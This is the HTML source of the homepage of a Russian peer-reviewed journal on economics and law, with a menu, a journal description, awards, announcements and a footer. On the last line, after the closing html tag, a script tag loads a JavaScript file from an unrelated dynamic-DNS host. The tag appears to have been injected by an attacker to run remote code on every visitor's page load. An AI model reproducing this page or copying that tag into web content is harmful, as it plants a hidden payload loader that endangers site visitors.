<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Актуальные проблемы экономики и права</title>
<link rel="stylesheet" href="design/css/reset.css" type="text/css" />
<link rel="stylesheet" href="design/css/apel.css" type="text/css" />
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />

<!--[if IE 6]><script type="text/javascript" src="design/js/iepngfix_tilebg.js"></script><![endif]-->

</head>

<body>

	<div class="all">
   
	<div class="top">
    
    <table style="margin:0 auto;"><tr><td width="1280">
	
	<table class="text">
	   
        <tr>
        
        <td class="left">
        <div class="apel"><img src="design/images/apel.png" width="70" height="50" /></div>
        <p class="lang"><a href="">in English</a></p></td>
        
        <td colspan="2" class="header">
        
		<div class="header_box"><h1 class="logo">Актуальные проблемы<br />экономики и права</h1></div>
        
        </td>
        
        </tr>
        
        <tr>
        
        <td class="left">&nbsp;</td>
        <td class="content">
        
            <div class="main_menu">
            <ul>
                   
                <li><div class="current"><span>О журнале</span></div></li>
                <li><a href=""><span>Авторам</span></a></li>
                <li><a href=""><span>Архив номеров</span></a></li>
                <li><a href=""><span>Подписка</span></a></li>
                <li><a href=""><span>Контакты</span></a></li>
            </ul>
            </div>
                
        </td>
        <td class="right"><p class="sans issn">ISSN 1993-047X</p></td>
        
        
        
        </tr>
        
        
   </table>
   
	</td></tr></table>
    
    </div>
   
<table style="margin:0 auto;"><tr><td width="1280">
	
	<table class="text">
	   
        <tr>
      
        <td colspan="3"><p>&nbsp;</p></td>
        </tr>
	
	
	<tr>
        
        <td class="left">
        
         <div class="left_menu">
         <ul>
               
            <li><a href="">Редакционная коллегия</a></li>
            <li><a href="">Политика журнала</a></li>
            <li><a href="">Наши авторы</a></li>
        </ul>
        </div>        
        
        </td>
        
        <td class="content">
        
        <table class="about">

	        <col width="295">
			<col>
            <tr>
        
        
        <td class="pic"><img src="design/images/cover.png" width="295" height="390" /></td>
        <td class="txt"><p>Федеральный рецензируемый журнал &laquo;Актуальные проблемы экономики и&nbsp;права&raquo;&nbsp;&mdash; научное и&nbsp;информационно-аналитическое издание в&nbsp;области экономических и&nbsp;юридических наук.</p><p>Авторами и&nbsp;читателями журнала являются научные работники и&nbsp;преподаватели вузов, аспиранты и&nbsp;студенты, государственные и&nbsp;муниципальные служащие, практикующие экономисты и&nbsp;юристы из&nbsp;Российской Федерации, стран СНГ и&nbsp;дальнего зарубежья.</p><p class="new"><a href="">Перейти к свежему номеру</a></p></td>
        
        </tr>
        </table>
       
		<h3 class="awards_header">Достижения журнала за последние 5 лет</h3>
       
        <table class="text"> 
        
        <tr>
        
            <td class="awards"><img src="design/images/paper.png" width="150" height="126" /><p>Опубликовано более 600&nbsp;статей ведущих специалистов России, США, Китая, Турции, Украины, Беларуси и&nbsp;других стран</p></td>
            <td class="awards"><div class="impact">0,036</div><p>Трехлетний импакт-фактор РИНЦ 2009</nobr> является самым высоким среди журналов гуманитарного профиля в&nbsp;Республике Татарстан</p></td>
            <td class="awards"><img src="design/images/diplom.png" width="150" height="126" /><p>Лауреат V&nbsp;международного конкурса &laquo;Университетская книга&nbsp;&mdash; 2010&raquo; в&nbsp;номинации &laquo;Лучшее вузовское периодическое издание&raquo;</p></td>
            <td class="awards"><img src="design/images/bases.png" width="150" height="126" /><p>Журнал включен в&nbsp;базу данных Российской научной электронной библиотеки (РУНЭБ) и&nbsp;информационно-правовой системы &laquo;ГАРАНТ&raquo;</p></td>   
             
        </tr>
             
        </table>
        
		<h2>Объявления и анонсы</h2>
                
		<table class="text">
                  <tr>
                    <td class="news"><p class="date">28 февраля</p>
                    <h3><a href="">Признание международного уровня</a></h3>
                    <p>Журнал ИЭУП «Актуальные проблемы экономики и&nbsp;права», внесенный в&nbsp;Перечень ВАК, признан «Лучшим вузовским периодическим изданием». А&nbsp;учебный комплекс «Экономика (учебное пособие и практикум)», разработанный коллективом авторов под редакцией ректора, профессора В.&nbsp;Г.&nbsp;Тимирясова, победил в&nbsp;номинации «Лучший комплект для школ».</p></td>
                    <td class="news"><p class="date">3 сентября</p>
                    <h3><a href="">Книжный «Оскар»</a></h3>
                    <p>Подведены итоги IV конкурса «Гуманитарная книга&nbsp;– 2010» среди преподавателей образовательных учреждений среднего профессионального и&nbsp;высшего профессионального образования, аспирантов и&nbsp;соискателей Приволжского Федерального округа, который проходил в&nbsp;Государственной универсальной областной научной библиотеке имени А.&nbsp;И.&nbsp;Герцена.</p></td>
                  </tr>
                </table>
       
        </td>
        
        <td class="right">
        
        <div class="right_box">
        
        <p class="vak"><i>Журнал включен<br />в&nbsp;<a href="http://vak.ed.gov.ru/ru/help_desk/list/" target="_blank">Перечень&nbsp;ВАК</a><br />Минобрнауки&nbsp;РФ</i></p>
        
        <h3 class="awards_header">Отличные условия для&nbsp;авторов</h3>
        
        <ul>
            <li>Публикация наиболее актуальных материалов;</li>
            <li>Широкий спектр рассматриваемых проблем;</li>
            <li>Абсолютное соблюдение требований к&nbsp;публикации научных работ;</li>
            <li>Квалифицированный редакционный совет и&nbsp;редакционная коллегия;</li>
            <li>Бесплатный перевод статей, переводчик&nbsp;&mdash; член Гильдии переводчиков РТ;</li>
            <li>Бесплатная публикация аспирантов;</li>
            <li>Принятие решения о&nbsp;публикации в&nbsp;течение месяца.</li>
        </ul>

        <div class="pub"><a href="">Правила<br />публикации</a></div>
        
        <h3>Поиск</h3>
        
        <p class="search">по ключевым словам, авторам:</p>
		<p><input type="text" class="search_input" /><br />
		<input type="button" value="Искать" /></p>
        
        <h3>Полезные ссылки</h3>
		<ul>
        <li><a href="#">Издательские ГОСТы</a></li>
        <li><a href="#">Словари</a></li>
        <li><a href="#">Правила транслитерации</a></li>
	    </ul>        
        
        </div>
        
        </td>
        </tr>
        
   </table>
   
</td></tr></table>

	<div class="empty">&nbsp;</div>

	</div>

<div class="footer">

<div class="scissor">&nbsp;</div>

<table style="margin:0 auto;"><tr><td width="1280">

    <table class="text">
    
    <tr>
        
        <td class="left">&nbsp;</td>
        <td class="content"><p>&copy 1996&ndash;2011 Научный журнал &laquo;Актуальные проблемы экономики и&nbsp;права&raquo;</p> </td>
        <td class="right"><p style="padding-left:1.25em;">Сделано в&nbsp;студии&nbsp;&nbsp;<a href="http://gutdesign.ru" class="gutdesign">Гутдизайн</a></p></td>        
                     
        </tr>
    
    </table>

 </td></tr></table>

</div>

</body>

</html>
<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>